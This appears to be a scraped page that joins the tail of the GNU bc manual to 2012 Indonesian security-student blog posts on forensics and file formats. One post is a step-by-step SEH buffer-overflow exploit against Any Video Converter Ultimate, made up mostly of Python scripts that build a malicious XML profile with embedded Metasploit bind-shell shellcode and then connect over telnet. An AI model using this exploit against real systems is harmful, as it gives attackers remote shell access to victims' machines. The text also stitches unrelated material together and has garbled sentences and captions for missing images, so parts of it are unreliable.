
  for (i=2; 1; i++) {
    e = (a *= x) / (d *= i)
    if (e == 0) {
      if (f>0) while (f--)  v = v*v;
      scale = z
      if (m) return (1/v);
      return (v/1);
    }
    v += e
  }
}

The following is code that uses the extended features of bc to implement a simple program for calculating checkbook balances. This program is best kept in a file so that it can be used many times without having to retype it at every use.





scale=2
print "\nCheck book program!\n"
print "  Remember, deposits are negative transactions.\n"
print "  Exit by a 0 transaction.\n\n"

print "Initial balance? "; bal = read()
bal /= 1
print "\n"
while (1) {
  "current balance = "; bal
  "transaction? "; trans = read()
  if (trans == 0) break;
  bal -= trans
  bal /= 1
}
quit

The following is the definition of the recursive factorial function.





define f (x) {
  if (x <= 1) return (1);
  return (f(x-1) * x);
}

READLINE AND LIBEDIT OPTIONS

GNU bc can be compiled (via a configure option) to use the GNU readline input editor library or the BSD libedit library. This allows the user to do editing of lines before sending them to bc. It also allows for a history of previous lines typed. When this option is selected, bc has one more special variable. This special variable, history is the number of lines of history retained. For readline, a value of -1 means that an unlimited number of history lines are retained. Setting the value of history to a positive number restricts the number of history lines to the number given. The value of 0 disables the history feature. The default value is 100. For more information, read the user manuals for the GNU readline, history and BSD libedit libraries. One can not enable both readline and libedit at the same time.

DIFFERENCES

This version of bc was implemented from the POSIX P1003.2/D11 draft and contains several differences and extensions relative to the draft and traditional implementations. It is not implemented in the traditional way using dc(1). This version is a single process which parses and runs a byte code translation of the program. There is an "undocumented" option (-c) that causes the program to output the byte code to the standard output instead of running it. It was mainly used for debugging the parser and preparing the math library. A major source of differences is extensions, where a feature is extended to add more functionality and additions, where new features are added. The following is the list of differences and extensions.

LANG

This version does not conform to the POSIX standard in the processing of the LANG environment variable and all environment variables starting with LC_.

names

Traditional and POSIX bc have single letter names for functions, variables and arrays. They have been extended to be multi-character names that start with a letter and may contain letters, numbers and the underscore character.

Strings

Strings are not allowed to contain NUL characters. POSIX says all characters must be included in strings.

last

POSIX bc does not have a last variable. Some implementations of bc use the period (.) in a similar way.

comparisons

POSIX bc allows comparisons only in the if statement, the while statement, and the second expression of the for statement. Also, only one relational operation is allowed in each of those statements.

if statement, else clause

POSIX bc does not have an else clause.

for statement

POSIX bc requires all expressions to be present in the for statement.

&&, ||, !

POSIX bc does not have the logical operators.

read function

POSIX bc does not have a read function.

print statement

POSIX bc does not have a print statement .

continue statement

POSIX bc does not have a continue statement.

return statement

POSIX bc requires parentheses around the return expression.

array parameters

POSIX bc does not (currently) support array parameters in full. The POSIX grammar allows for arrays in function definitions, but does not provide a method to specify an array as an actual parameter. (This is most likely an oversight in the grammar.) Traditional implementations of bc have only call by value array parameters.

function format

POSIX bc requires the opening brace on the same line as the define key word and the auto statement on the next line.

=+, =-, =*, =/, =%, =^

POSIX bc does not require these "old style" assignment operators to be defined. This version may allow these "old style" assignments. Use the limits statement to see if the installed version supports them. If it does support the "old style" assignment operators, the statement "a =- 1" will decrement a by 1 instead of setting a to the value -1.

spaces in numbers

Other implementations of bc allow spaces in numbers. For example, "x=1 3" would assign the value 13 to the variable x. The same statement would cause a syntax error in this version of bc.

errors and execution

This implementation varies from other implementations in terms of what code will be executed when syntax and other errors are found in the program. If a syntax error is found in a function definition, error recovery tries to find the beginning of a statement and continue to parse the function. Once a syntax error is found in the function, the function will not be callable and becomes undefined. Syntax errors in the interactive execution code will invalidate the current execution block. The execution block is terminated by an end of line that appears after a complete sequence of statements. For example,




a = 1
b = 2

has two execution blocks and




{ a = 1
  b = 2 }

has one execution block. Any runtime error will terminate the execution of the current execution block. A runtime warning will not terminate the current execution block.

Interrupts

During an interactive session, the SIGINT signal (usually generated by the control-C character from the terminal) will cause execution of the current execution block to be interrupted. It will display a "runtime" error indicating which function was interrupted. After all runtime structures have been cleaned up, a message will be printed to notify the user that bc is ready for more input. All previously defined functions remain defined and the value of all non-auto variables are the value at the point of interruption. All auto variables and function parameters are removed during the clean up process. During a non-interactive session, the SIGINT signal will terminate the entire run of bc.

LIMITS

The following are the limits currently in place for this bc processor. Some of them may have been changed by an installation. Use the limits statement to see the actual values.

BC_BASE_MAX: The maximum output base is currently set at 999. The maximum input base is 16.
BC_DIM_MAX: This is currently an arbitrary limit of 65535 as distributed. Your installation may be different.
BC_SCALE_MAX: The number of digits after the decimal point is limited to INT_MAX digits. Also, the number of digits before the decimal point is limited to INT_MAX digits.
BC_STRING_MAX: The limit on the number of characters in a string is INT_MAX characters.
exponent: The value of the exponent in the raise operation (^) is limited to LONG_MAX.
variable names: The current limit on the number of unique names is 32767 for each of simple variables, arrays and functions.; from linux.about.com

Minggu, 27 Mei 2012

Exploit Any Video Converter Ultimate With Buffer Overflow SEH

I try for make fuzzer so application Any Video Converter Ultimate crushed with order

Referensi-->(Based on POC by Vulnerability-Lab (http://www.exploit-db.com/exploits/18717/))

file="profiles_v2.xml"

data1= "\x41" * 3500

poc="<root>\n"

poc=poc + "<categories>\n"

poc=poc + "<category name=\"" + data1 +"\" id=\"0\" icon=\"cat_all.bmp\" desc=\"All Profiles\"/>\n"

poc=poc + "</categories>\n"

poc=poc + "<groups></groups>\n<profiles></profiles>\n</root>\n"

try:

print "[*] Creating exploit file...\n"

writeFile = open (file, "w")

writeFile.write( poc )

print "berhasil berhasil hore"

except:

print "sial gagal"

sys.exit()

after than I copy file profiles_v2.xml and paste to C:\Program Files\AnvSoft\Any Video Converter Ultimate

now I check whether the value EIP already crushed.. and the results

Next, i search the location command POP, POP RETN in this module

next I will make pattern_create and after be value from pattern_create then inserted on fuzzer made earlier

#!/usr/bin/python

file="profiles_v2.xml"

data1= "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al"

poc="<root>\n"

poc=poc + "<categories>\n"

poc=poc + "<category name=\"" + data1 +"\" id=\"0\" icon=\"cat_all.bmp\" desc=\"All Profiles\"/>\n"

poc=poc + "</categories>\n"

poc=poc + "<groups></groups>\n<profiles></profiles>\n</root>\n"

try:

print "[*] Creating exploit file...\n"

writeFile = open (file, "w")

writeFile.write( poc )

print "berhasil berhasil hore"

except:

print "sial gagal"

sys.exit()

next i try to choose the module that i will use to search the address that saved command POP, POP RETN inside it.That address will use to overwritte the SEH address in application.

and I search file tpye .dll on any video converter ultimate witn order nosafeseh in immunity and the results

last I search value from pattern_offset for insert into the my fuzzer with orders

From the result above, i can see if the buffer value \x41 has succes entry inside the SEH Handler. Ok, next i modification my fuzzer script again.

#!/usr/bin/python

file="profiles_v2.xml"

data1= "\x90" * 328

data1+= "\xcc\xcc\xcc\xcc"

data1+= "\xe4\xf3\x04\x10"

data1+= "\x90" * (354-len(data1))

poc="<root>\n"

poc=poc + "<categories>\n"

poc=poc + "<category name=\"" + data1 +"\" id=\"0\" icon=\"cat_all.bmp\" desc=\"All Profiles\"/>\n"

poc=poc + "</categories>\n"

poc=poc + "<groups></groups>\n<profiles></profiles>\n</root>\n"

try:

print "[*] Creating exploit file...\n"

writeFile = open (file, "w")

writeFile.write( poc )

print "berhasil berhasil hore"

except:

print "sial gagal"

sys.exit()

then I i try to make the payload by using the Metasploit Web Based. This time, i try to use Windows Bind Shell Payload and i got the payload like this

And then i copy again that shellcode to my fuzzer script.

#!/usr/bin/python

file="profiles_v2.xml"

data1= "\x90" * 328
data1+= "\xeb\x06\x90\x90"
data1+= "\xe4\xf3\x04\x10"
data1+= ("\xb8\xe1\x4a\x5d\x6b\xdd\xc6\x33\xc9\xd9\x74\x24\xf4\x5b\xb1\x51"
"\x31\x43\x12\x83\xeb\xfc\x03\xa2\x44\xbf\x9e\xd8\x33\xd4\x2c\xc8"
"\x3d\xd5\x50\xf7\xde\xa1\xc3\x23\x3b\x3d\x5e\x17\xc8\x3d\x64\x1f"
"\xcf\x52\xed\x90\xd7\x27\xad\x0e\xe9\xdc\x1b\xc5\xdd\xa9\x9d\x37"
"\x2c\x6e\x04\x6b\xcb\xae\x43\x74\x15\xe4\xa1\x7b\x57\x12\x4d\x40"
"\x03\xc1\x86\xc3\x4e\x82\x88\x0f\x90\x7e\x50\xc4\x9e\xcb\x16\x85"
"\x82\xca\xc3\x3a\x97\x47\x9a\x50\xc3\x4b\xfc\x6b\x3a\xaf\x9a\xe0"
"\x7e\x7f\xe8\xb6\x8c\xf4\x9e\x2a\x20\x81\x1f\x5a\x64\xfe\x11\x14"
"\x96\x12\x7d\x57\x70\x8c\x2d\xc1\x15\x62\xe0\x65\x91\xf7\x36\x2a"
"\x09\x07\xe6\xbc\x7a\x1a\xfb\x07\x2d\x1a\xd2\x28\x44\x01\xbd\x57"
"\xbb\xc2\x40\x02\x2e\xd1\xbb\x7c\xc6\x0c\x4a\x89\xba\xf8\xb2\xa7"
"\x96\x55\x1e\x14\x4a\x19\xf3\xd9\x3f\x62\x23\xbb\xd7\x8d\x98\x25"
"\x7b\x27\xc1\x3c\x13\x93\x18\x4e\x23\x8c\xe3\x78\xc1\x23\x4d\xd1"
"\xe9\x94\x05\x7d\xb8\x3b\x3f\x2a\x3c\x95\xec\x81\x3d\xca\x7b\xcc"
"\x8b\x6d\x32\x59\xf3\xa4\x95\x31\x5f\x1c\xe9\x69\xcc\xf6\xf2\xf0"
"\x35\x7f\xaa\xfd\x6c\xd5\xab\xd1\xf7\xbc\x37\xb7\x9f\x23\xd5\xbe"
"\x85\xce\x75\x99\x6c\xc3\xff\xfe\x05\x9f\x76\xe2\xeb\xdf\x7a\x48"
"\xf5\xa2\x51\x72\x48\x0f\x39\x07\x37\x77\x96\xbc\x63\xef\x9a\x3c"
"\xc0\xe6\xa5\xb5\x63\xf8\x8c\x6e\x3b\x54\x60\xc1\x92\x32\x83\xb0"
"\x45\x96\xd2\xcd\xb6\x70\x78\xe8\x32\x4f\xd1\xf5\xeb\x25\x29\xf6"
"\x23\x45\x05\x83\x1b\x45\x25\x57\xc7\x4a\xfc\x05\xf7\x65\x69\x59"
"\x8d\x82\x35\xca\x6d\x5c\x36\x3c"")
data1+= "\x90" * (354-len(data1))

poc="<root>\n"

poc=poc + "<categories>\n"

poc=poc + "<category name=\"" + data1 +"\" id=\"0\" icon=\"cat_all.bmp\" desc=\"All Profiles\"/>\n"

poc=poc + "</categories>\n"

poc=poc + "<groups></groups>\n<profiles></profiles>\n</root>\n"

try:

print "[*] Creating exploit file...\n"

writeFile = open (file, "w")

writeFile.write( poc )

print "berhasil berhasil hore"

except:

print "sial gagal"

sys.exit()

Next, i run the fuzzer script again and run telnet with command telnet 192.168.56.101 4444

And then the result was like this

Minggu, 25 Maret 2012

Read File practical.floppy.dd

the above command used for clon file practical.floppy.dd to /dev with name tgsforensics

picture above make directory with name mencari and analisa but directory analisa is in directory /mnt

for see information disk with type name sda

picture a above used for clone file tgsforensics to directory mencari with name pdf.disk1

picture above use read-write permissions, 444 gives all users read-only
access

This is the same as the first dd command, only in reverse

image above used for view the contents of image have to restore it another disk to mount using the loop interface.

image above used off to /mnt/analisa

image above used for hashing /dev/tgsforensics

find, starting in the current directory (signified bycat the “.”)

concatenate files and print on the standard output

image above used for hashing file is in directory mencari

image above used for see data is in directory /mnt/analisa

image above for classify a file

Minggu, 18 Maret 2012

Slack space, Unallocated space, Magic number and structure of a file

Slack space
Slack space refers to portions of a hard drive that are not fully used by the current allocated file and which may contain data from a previously deleted file

llustration of slack space on a hard drive

In the example above, saving a 768 byte file (named User_File.txt) requires only sector 1 and 1/2 of sector 2 in the cluster. Depending on the operating system, the remaining 256 bytes in sector 2 might be filled with 1′s or 0′s or might simply remain intact. Both sectors 3 and 4 would not be overwritten and are thus considered slack space. If the slack space previously contained data from a deleted file, this information could be recovered with forensic tools. Additional Details Operating systems allocate files on a hard drive using clusters, which are a collection of contiguous sectors. Because a cluster is the smaller allocation unit an operating system can address, if a file does not utilize the full cluster, a portion of the space remaining may not be overwritten and might contain data from a previously deleted file. For forensic analysts, it is important to understand that slace space is considered allocated space since it is part of an allocated cluster. As such, special tools must be used to extract and analyse slace space. An analysis of unallocated data will not contain any slack space data.

unallocated space
Unallocated space, sometimes called “free space”, is logical space on a hard drive that the operating system, e.g Windows, can write to. To put it another way it is the opposite of “allocated” space, which is where the operating system has already written files to.
Examples.
If the operating system writes a file to a certain space on the hard drive that part of the drive is now “allocated”, as the file is using it the space, and no other files can be written to that section. If that file is deleted then that part of the hard drive is no longer required to be “allocated” it becomes unallocated. This means that new files can now be re-written to that location.
On a standard, working computer, files can only be written to the unallocated space.
If a newly formatted drive is connected to a computer, virtually all of the drive space is unallocated space (a small amount of space will be taken up by files within the file system, e.g $MFT, etc). On a new drive the unallocated space is normally zeros, as files are written to the hard drive the zeros are over written with the file data
Working Example
Blank Drive
A freshly formatted (NTFS) 500 GB hard drive starts with 99.9% unallocated space; we will assume its 100% to make the maths slightly easier. All of the unallocated space will be zeros, literally 00 00 00 written on the hard drives.
If a 5 GB file, e.g a large movie, is placed on the drive, then there will be 1% (5 GB) allocated space and 99% unallocated (495 GB)
If a 10 GB database file is now added to this hard drive there will be a total of 3 % (15 GB) of allocated space and 485 GB unallocated space. New files will only be written into the remaining unallocated space.

magic number
A magic number is a number embedded at or near the beginning of a file that indicates its file format (i.e., the type of file it is). It is also sometimes referred to as a file signature.
Magic numbers are generally not visible to users. However, they can easily be seen with the use of a hex editor, which is a specialized program that shows and allows modification of every byte in a file.
For common file formats, the numbers conveniently represent the names of the file types. Thus, for example, the magic number for image files conforming to the widely used GIF87a format in hexadecimal (i.e., base 16) terms is 0x474946383761, which when converted into ASCII is GIF87a. ASCII is the de facto standard used by computers and communications equipment for character encoding (i.e., associating alphabetic and other characters with numbers).
Likewise, the magic number for image files having the subsequently introduced GIF89a format is 0x474946383961. For both types of GIF (Graphic Interchange Format) files, the magic number occupies the first six bytes of the file. They are then followed by additional general information (i.e., metadata) about the file.
Similarly, a commonly used magic number for JPEG (Joint Photographic Experts Group) image files is 0x4A464946, which is the ASCII equivalent of JFIF (JPEG File Interchange Format). However, JPEG magic numbers are not the first bytes in the file; rather, they begin with the seventh byte. Additional examples include 0x4D546864 for MIDI (Musical Instrument Digital Interface) files and 0x425a6831415925 for bzip2 compressed files.
Magic numbers are not always the ASCII equivalent of the name of the file format, or even something similar. For example, in some types of files they represent the name or initials of the developer of that file format. Also, in at least one type of file the magic number represents the birthday of that format's developer.
Various programs make use of magic numbers to determine the file type. Among them is the command line (i.e., all-text mode) program named file, whose sole purpose is determining the file type.
Although they can be useful, magic numbers are not always sufficient to determine the file type. The main reason is that some file types do not have magic numbers, most notably plain text files, which include HTML (hypertext markup language), XHTML (extensible HTML) and XML (extensible markup language) files as well as source code.
Fortunately, there are also other means that can be used by programs to determine file types. One is by looking at a file's character set (e.g., ASCII) to see if it is a plain text file. If it is determined that a file is a plain text file, then it is often possible to further categorize it on the basis of the start of the text, such as <html> for HTML files and #! (the so-called shebang) for script (i.e., short program) files.
Another way to determine file types is through the use of filename extensions (e.g., .exe, .html and .jpg), which are required on the various Microsoft operating systems but only to a small extent on Linux and other Unix like operating systems. However, this approach has the disadvantage that it relatively easy for a user to accidentally change or remove the extensions, in which case it becomes difficult to determine the file type and use the file.
Still another way that is possible in the case of some commonly used filesystems is through the use of file type information that is embedded in each file's metadata. In Unix-like operating systems, such metadata is contained in inodes, which are data structures (i.e., efficient ways of storing information) that store all the information about files except their names and their actual data.
Magic numbers are referred to as magic because the purpose and significance of their values are not apparent without some additional knowledge. The term magic number is also used in programming to refer to a constant that is employed for some specific purpose but whose presence or value is inexplicable without additional information.

structure of a file

File structure on Borland Delphi 7
When we create a new project and then save it then we will get RecentMost file appears on the folder where the project disimpan.File new-file are:
1. *. Cfg Contains about the configuration file.
2. *. Dof Contains the options of a project That is expressed through selection Project | Options
3. *. Dsk Contains the options of a project That is expressed through selection Tools | Environment Options.
4. *. Res Binary file containing icons used by the project.
5. *. Dcu Unit already been compiled, this file appears when Delphi project has been compiled.
6. *. Dfm Storing information Relating to the form.
7. *. Dpr Storing information Relating to the form.
8. *. Pas Place source code is stored.

structure of a file mp3

MP3 files are composed of multiple MP3 frames which consist of the MP3 header and the data MP3.Frame are independent items: one can cut a frame from the file and the MP3 player will be the actual payload.Diagram memainkannya.Data MP3 audio shows that the MP3 header consists of a sync word used to identify the initial frame valid.Ini followed by a little show that this is the MPEG standard and two bits that indicate that layer 3 is used, then the MPEG-1 Audio layer 3 or MP3.Setelah this, the values will differ depending on the file MP3.Kisaran value for each part of the header along with the header specifications defined by ISO / IEC 11 172-3.Kebanyakan MP3 files today contain ID3 metadata which precedes or follows the MP3 frames; are also shown in the diagram.

Structur File .bz2

A .bz2 stream consists of a 4-byte header, followed by zero or more compressed blocks, immediately followed by an end-of-stream marker containing a 32-bit CRC for the plaintext whole stream processed. The compressed blocks are bit-aligned and no padding occurs.

Because of the first-stage RLE compression (see above), the maximum length of plaintext that a single 900 kB bzip2 block can contain is around 46 MB (45,899,235 bytes). This can occur if the whole plaintext consists entirely of repeated values (the resulting .bz2 file in this case is 46 bytes long). An even smaller file of 40 bytes can be achieved by using an input containing entirely values of 251, an apparent compression ratio of 1147480:1.